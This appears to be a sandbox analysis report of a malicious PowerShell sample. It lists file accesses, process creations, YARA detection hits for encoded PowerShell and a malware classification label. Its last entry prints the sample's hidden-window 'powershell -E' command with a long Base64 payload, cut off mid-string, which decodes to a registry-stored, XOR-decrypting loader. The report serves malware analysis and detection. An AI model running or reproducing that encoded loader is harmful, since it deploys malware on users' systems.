Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Jump to behavior |
Source: unknown |
Process created: Commandline size = 5184 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: Commandline size = 5176 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: Commandline size = 5165 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: Commandline size = 5176 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: Commandline size = 5165 |
Jump to behavior |
Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTR |
Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28 |
Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTR |
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score = |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_003CB2EE NtQuerySystemInformation, |
3_2_003CB2EE |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 3_2_003CB2CC NtQuerySystemInformation, |
3_2_003CB2CC |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp |
Jump to behavior |
Source: classification engine |
Classification label: mal52.evad.win@5/2@0/0 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Console Write: ........................................(.P.....................8.......H.......................0............................................... |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Console Write: ........................................(.P.....................8.......d.......................0...............X.'............................. |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Console Write: ........................................(.P.....................8.......m.......................0...............X.'.............8."............. |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Console Write: ........................................(.P.....................8.......v.......................0....................... .......8."............. |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Console Write: ........................................(.P.....................8...............................0...............X.'............................. |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQ |